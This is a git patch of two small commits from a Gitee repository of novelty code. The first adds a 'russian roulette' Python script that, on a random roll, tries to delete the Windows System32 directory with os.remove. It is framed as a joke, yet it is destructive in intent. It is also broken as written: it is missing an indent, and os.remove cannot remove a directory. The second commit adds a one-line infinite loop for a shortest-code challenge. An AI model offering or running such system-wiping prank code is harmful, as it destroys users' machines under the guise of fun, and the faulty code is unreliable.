From 12ccb2b99aedd484a9daa84bef30319aedb78598 Mon Sep 17 00:00:00 2001 From: payioad <13502994+testrwwdjjiw@user.noreply.gitee.com> Date: Mon, 22 Jan 2024 03:08:47 +0000 Subject: [PATCH 1/2] =?UTF-8?q?add=20=E5=A5=BD=E7=8E=A9=E4=BD=86=E6=B2=A1?= =?UTF-8?q?=E4=BB=80=E4=B9=88=E7=94=A8=E4=BB=A3=E7=A0=81/russian=20roulett?= =?UTF-8?q?e.py.?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: payioad <13502994+testrwwdjjiw@user.noreply.gitee.com> --- .../russian roulette.py" | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 "\345\245\275\347\216\251\344\275\206\346\262\241\344\273\200\344\271\210\347\224\250\344\273\243\347\240\201/russian roulette.py" diff --git "a/\345\245\275\347\216\251\344\275\206\346\262\241\344\273\200\344\271\210\347\224\250\344\273\243\347\240\201/russian roulette.py" "b/\345\245\275\347\216\251\344\275\206\346\262\241\344\273\200\344\271\210\347\224\250\344\273\243\347\240\201/russian roulette.py" new file mode 100644 index 0000000..b00b941 --- /dev/null +++ "b/\345\245\275\347\216\251\344\275\206\346\262\241\344\273\200\344\271\210\347\224\250\344\273\243\347\240\201/russian roulette.py" @@ -0,0 +1,4 @@ +import random +import os +if random.randint(0,6) == 1: +os.remove("C:\Windows\System32") \ No newline at end of file -- Gitee From 2eeeee2c87e0423d3f777a850ec2c75966e41703 Mon Sep 17 00:00:00 2001 From: payioad <13502994+testrwwdjjiw@user.noreply.gitee.com> Date: Mon, 22 Jan 2024 03:22:10 +0000 Subject: [PATCH 2/2] =?UTF-8?q?add=20=E6=9C=80=E7=9F=AD=E4=BB=A3=E7=A0=81?= =?UTF-8?q?=E6=8C=91=E6=88=98/Shortest=20infinite=20Python=20program.py.?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: payioad <13502994+testrwwdjjiw@user.noreply.gitee.com> --- .../Shortest infinite Python program.py" | 1 + 1 file changed, 1 insertion(+) create mode 100644 "\346\234\200\347\237\255\344\273\243\347\240\201\346\214\221\346\210\230/Shortest infinite Python program.py" diff --git "a/\346\234\200\347\237\255\344\273\243\347\240\201\346\214\221\346\210\230/Shortest infinite Python program.py" "b/\346\234\200\347\237\255\344\273\243\347\240\201\346\214\221\346\210\230/Shortest infinite Python program.py" new file mode 100644 index 0000000..dc9554d --- /dev/null +++ "b/\346\234\200\347\237\255\344\273\243\347\240\201\346\214\221\346\210\230/Shortest infinite Python program.py" @@ -0,0 +1 @@ +while 1:0 \ No newline at end of file -- Gitee